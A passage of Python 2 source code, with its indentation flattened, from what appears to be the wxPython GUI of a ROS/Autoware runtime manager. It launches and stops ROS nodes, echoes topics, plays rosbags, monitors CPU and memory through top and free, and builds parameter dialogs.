nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = [ 'rosparam', 'get', rosparam ]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = [ 'rosparam', 'set', rosparam, v ] if v != '' else [ 'rosparam', 'delete', rosparam ]
print(cmd)
subprocess.call(cmd)
#
# Sensing Tab
#
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnRosbagRecord(self, event):
self.dlg_rosbag_record.Show()
obj = event.GetEventObject()
set_val(obj, False)
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
if 'name' not in dic:
return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 4)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
if 'param' in dic:
obj = self.add_config_link(dic, panel, obj)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def add_config_link(self, dic, panel, obj):
cfg_obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, '[config]', '')
fix_link_color(cfg_obj)
self.Bind(wx.EVT_HYPERLINK, self.OnConfig, cfg_obj)
add_objs = (obj, wx.StaticText(panel, wx.ID_ANY, ' '), cfg_obj)
hszr = sizer_wrap(add_objs, wx.HORIZONTAL)
name = dic['name']
pdic = self.load_dic_pdic_setup(name, dic)
gdic = self.gdic_get_1st(dic)
prm = self.get_param(dic.get('param'))
self.add_cfg_info(cfg_obj, obj, name, pdic, gdic, True, prm)
return hszr
def camera_ids(self):
if self.button_synchronization.GetValue():
return []
cmd = "rostopic list | sed -n 's|/image_raw||p' | sed s/^$//"
return subprocess.check_output(cmd, shell=True).strip().split()
def cam_id_to_obj(self, cam_id, v):
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
if cam_id_obj is None:
cam_id_obj = StrValObj(cam_id, v)
cam_id_obj.SetValue(v)
return cam_id_obj
def camera_id_hook(self, args):
new_id = args.get('pdic', {}).get('camera_id', '')
ids = args.get('ids', [])
if new_id not in ids:
return
idx = ids.index(new_id)
pp = args.get('param_panel')
if pp:
pp.detach_func()
dlg = args.get('dlg')
if dlg:
dlg.EndModal(idx + 100)
def OnCalibrationPublisher(self, event):
obj = event.GetEventObject()
(_, gdic_org, prm) = self.obj_to_pdic_gdic_prm(obj)
if obj.GetValue():
gdic_org['ids'] = self.camera_ids()
ids = gdic_org.get('ids', [])
if ids == []:
self.OnLaunchKill(event)
return
#
# setup
#
(cmd_dic, cmd, _) = self.obj_to_cmd_dic_cmd_proc(obj)
flags = gdic_org.get('flags', [])[:] # copy
if 'open_dialog' in flags:
flags.remove('open_dialog')
pdic_baks = {}
for cam_id in ids:
(pdic_a, gdic_a, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic = pdic_a if pdic_a else self.load_dic_pdic_setup(cam_id, {})
pdic_baks[cam_id] = pdic.copy()
gdic = gdic_a if gdic_a else gdic_org.copy()
gdic['flags'] = flags
cam_id_obj = self.cam_id_to_obj(cam_id, obj.GetValue())
if not pdic_a or not gdic_a:
self.add_cfg_info(cam_id_obj, cam_id_obj, cam_id, pdic, gdic, False, prm)
if not cam_id_obj in cmd_dic:
cmd_dic[ cam_id_obj ] = (cmd, None)
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
#
# Dialog
#
cam_id = ids[0]
while obj.GetValue():
(pdic, gdic, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic['camera_id'] = cam_id
dic_list_push(gdic, 'dialog_type', 'open2')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
gdic_v = dic_getset(gdic, 'camera_id', {})
args = { 'pdic':pdic, 'ids':ids, 'param_panel':gdic.get('param_panel'), 'dlg':dlg }
gdic_v['hook_var'] = { 'hook':self.camera_id_hook, 'args':args }
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
pdic['camera_id'] = cam_id # restore
if dlg_ret == 0: # OK
break
idx = dlg_ret - 100
if idx < 0 or len(ids) <= idx: # Cancel
for cam_id in ids:
(pdic, _, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic.update(pdic_baks.get(cam_id))
set_val(obj, False)
return
# Menu changed
cam_id = ids[idx]
#
# Launch / Kill
#
for cam_id in ids:
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
(pdic, _, _) = self.obj_to_pdic_gdic_prm(cam_id_obj)
pdic['solo_camera'] = False
#print '@', cam_id, cam_id_obj.GetValue()
self.OnLaunchKill_obj(cam_id_obj)
#
# Simulation Tab
#
def rosbag_info_hook(self, v):
if not v:
return
err = subprocess.STDOUT
s = subprocess.check_output([ 'rosbag', 'info', v ], stderr=err).strip()
self.label_rosbag_info.SetLabel(s)
self.label_rosbag_info.GetParent().FitInside()
#
# Data Tab
#
#
# Stauts tab
#
def info_col(self, v, v_yellow, v_red, col_normal, col_red):
if v < v_yellow:
return col_normal
if v < v_red:
(nr,ng,nb) = col_normal
(rr,rg,rb) = col_red
return ( (nr+rr)/2, (ng+rg)/2, (nb+rb)/2 )
return col_red
def mem_kb_info(self):
lst = subprocess.check_output(['free']).strip().split('\n')[2].split()[2:4]
used = int(lst[0])
free = int(lst[1])
return (used + free, used)
def toprc_create(self):
(child_pid, fd) = pty.fork()
if child_pid == 0: # child
os.execvp('top', ['top'])
else: #parent
sec = 0.2
for s in ['1', 'c', 'W', 'q']:
time.sleep(sec)
os.write(fd, s)
def toprc_setup(self, toprc, backup):
if os.path.exists(toprc):
os.rename(toprc, backup)
self.toprc_create()
def toprc_restore(self, toprc, backup):
os.remove(toprc)
if os.path.exists(backup):
os.rename(backup, toprc)
# top command thread
def top_cmd_th(self, ev, setting, cpu_ibls, mem_ibl, toprc, backup):
interval = setting.get('interval', 3)
alert_level = setting.get('alert_level', {})
rate_per_cpu = alert_level.get('rate_per_cpu', 80)
rate_per_cpu_yellow = alert_level.get('rate_per_cpu_yellow', 80)
rate_cpu = alert_level.get('rate_cpu', 80)
rate_mem = alert_level.get('rate_mem', 80)
rate_mem_yellow = alert_level.get('rate_mem_yellow', 80)
for ibl in cpu_ibls:
ibl.lmt_bar_prg = rate_per_cpu
mem_ibl.lmt_bar_prg = rate_mem
alerted = False
cpu_n = psutil.NUM_CPUS
while not ev.wait(interval):
s = subprocess.check_output(['sh', '-c', 'env COLUMNS=512 top -b -n 2 -d 0.1']).strip()
i = s.rfind('\ntop -') + 1
s = s[i:]
wx.CallAfter(self.label_top_cmd.SetLabel, s)
wx.CallAfter(self.label_top_cmd.GetParent().FitInside)
k = '%Cpu'
fv_sum = 0
i = 0
for t in s.split('\n'):
if t[:len(k)] != k:
continue
lst = t[1:].split()
v = lst[1] if lst[1] != ':' else lst[2]
if v[0] == ':':
v = v[1:]
fv = str_to_float(v)
col = self.info_col(fv, rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
if i < cpu_n:
ibl = cpu_ibls[i]
wx.CallAfter(ibl.lb_set, v+'%', col)
wx.CallAfter(ibl.bar_set, int(fv))
fv_sum += fv
i += 1
k = 'KiB Mem:'
(total, used) = self.mem_kb_info()
rate = 100 * used / total
for u in [ 'KB', 'MB', 'GB', 'TB' ]:
if total <= 10 * 1024 or used <= 10:
break
total /= 1024
used /= 1024
col = self.info_col(rate, rate_mem_yellow, rate_mem, (64,64,64), (200,0,0))
tx = str(used) + u + '/' + str(total) + u + '(' + str(rate) + '%)'
wx.CallAfter(mem_ibl.lb_set, tx, col)
wx.CallAfter(mem_ibl.bar_set, rate)
is_alert = (fv_sum >= rate_cpu * cpu_n) or rate >= rate_mem
# --> for test
if os.path.exists('/tmp/alert_test_on'):
is_alert = True
if os.path.exists('/tmp/alert_test_off'):
is_alert = False
# <-- for test
if is_alert and not alerted:
thinf = th_start(self.alert_th, {'bgcol':(200,50,50)})
alerted = True
if not is_alert and alerted:
th_end(thinf)
alerted = False
# top5
i = s.find('\n\n') + 2
lst = s[i:].split('\n')
hd = lst[0]
top5 = lst[1:1+5]
i = hd.rfind('COMMAND')
cmds = [ line[i:].split(' ')[0] for line in top5 ]
i = hd.find('%CPU')
loads = [ line[i-1:].strip().split(' ')[0] for line in top5 ]
for (lb, cmd, load) in zip(self.lb_top5, cmds, loads):
col = self.info_col(str_to_float(load), rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
wx.CallAfter(lb.SetForegroundColour, col)
wx.CallAfter(lb.SetLabel, cmd + ' (' + load + ' %CPU)')
self.toprc_restore(toprc, backup)
def alert_th(self, bgcol, ev):
wx.CallAfter(self.RequestUserAttention)
c = bgcol
o = wx.NullColour
while not ev.wait(0.5):
for col in [ c, o, c, o, c, o ]:
wx.CallAfter(self.set_bg_all_tabs, col)
time.sleep(0.05)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def logout_th(self, que, interval, tc, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
ckbox = self.checkbox_stdout if que == self.log_que_stdout else self.checkbox_stderr
if ckbox.GetValue():
self.log_que_show.put( cut_esc(s) )
else: # == self.log_que
f = None
path = self.status_dic.get('log_path')
is_syslog = (path == 'syslog')
if is_syslog:
ident = sys.argv[0].split('/')[-1]
syslog.openlog(ident, syslog.LOG_PID | syslog.LOG_CONS)
elif path:
path = os.path.expandvars(os.path.expanduser(path))
f = open(path, 'a') if path else None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if is_syslog:
syslog.syslog(s)
elif f:
f.write(s)
f.flush()
if is_syslog:
syslog.closelog()
if f:
f.close()
def logshow_th(self, que, interval, tc, ev):
while not ev.wait(interval):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
wx.CallAfter(append_tc_limit, tc, s)
# que clear
if self.checkbox_stdout.GetValue() is False and \
self.checkbox_stderr.GetValue() is False and \
que.qsize() > 0:
que_clear(que)
wx.CallAfter(tc.Clear)
#
# for Topics tab
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output([ 'rostopic', 'info', topic ]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen([ 'rostopic', 'echo', topic ], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
#proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
#
# Common Utils
#
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[ k ] = gdic.get(k, []) + [ panel ]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def OnConfig(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[ prm['msg'] ]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[ cfg_obj ] = { 'obj':obj , 'name':name , 'pdic':pdic , 'gdic':gdic,
'run_disable':run_disable , 'param':prm }
def get_param(self, prm_name):
return next( (prm for prm in self.params if prm['name'] == prm_name), None)
def get_var(self, prm, var_name, def_ret=None):
return next( (var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def obj_to_cmd_dic(self, obj):
return next( (cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return (cmd_dic, cmd, proc)
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue()
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
if proc:
self.update_proc_cpu(obj)
def OnRosbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
set_val(stop, False)
set_val(pause, False)
elif obj == stop:
set_val(stop, True)
set_val(play, False)
set_val(pause, False)
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def OnFtrace(self, event):
obj = event.GetEventObject()
cmd = 'rosrun runtime_manager ftrace.py'
v = obj.GetValue()
self.ftrace_proc_ = self.launch_kill(v, cmd,
None if v else self.ftrace_proc_, obj=obj)
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
# thread
def point_cloud_progress_bar(self, file, ev):
obj = self.button_point_cloud
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('path_pcd', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
# thread
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar.clear)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total.SetLabel, '')
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
if key:
enable_set(o, key, en)
else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next( (grp for grp in self.alias_grps if obj in grp), [])
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
self.new_link(item, name, pdic, self.sys_gdic, pnl, 'sys', 'sys', add_objs)
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'app', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, ' ') ]
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']') ]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[ name ] = pdic
return pdic
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj)
(cfg_obj, dic) = self.cfg_obj_dic( {'obj':obj} )
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
if not v:
self.stat_label_off(obj)
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next( (obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
print(args) # for debug
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file':proc.stdout, 'que':self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file':proc.stderr, 'que':self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file':proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
proc.wait()
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
def roslaunch_to_nodes(self, cmd):
try:
s = subprocess.check_output(cmd).strip()
return s.split('\n') if s != '' else []
except subprocess.CalledProcessError:
return []
def set_bg_all_tabs(self, col=wx.NullColour):
add_pnls = [
self,
self.tree_ctrl_0,
self.tree_ctrl_1,
self.tree_ctrl_data ]
for tab in self.all_tabs + add_pnls:
tab.SetBackgroundColour(col)
def get_autoware_dir(self):
dir = rtmgr_src_dir() + '../../../../../../'
return os.path.abspath(dir)
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def toggle_enable_obj(self, obj):
objs = []
pfs = [ 'button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_' ]
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [ eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', []) ]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def obj_name_split(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return (None, None)
return next( ( ( name[:len(pf)], name[len(pf):] ) for pf in pfs if name[:len(pf)] == pf ), None)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next( (name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [ self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key) ]
def name_get(self, obj):
return next( (nm for nm in dir(self) if getattr(self, nm) is obj), None)
def name_get_cond(self, obj, cond=(lambda s : True), def_ret=None):
return next( (nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def val_get(self, name):
obj = self.obj_get(name)
if obj is None:
return None
return obj.GetValue() if getattr(obj, 'GetValue', None) else None
def obj_get(self, name):
return getattr(self, name, None)
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
only_chk = next( (False for (k,type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
allow_chk = next( (False for (k,type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam') )
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj( {'pdic':self.pdic, 'gdic':self.gdic, 'param':self.prm} )
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars : [ var for var in vars if var.get('name') == name ]
vars = reduce( lambda lst, name : lst + var_lst(name, vars), self.gdic.get('show_order'), [] )
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None if hszr else hszr
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, 'rosparam : ' + var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [ [], 0 ])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[ k ] = self.gdic.get(k, []) + [ vp ]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
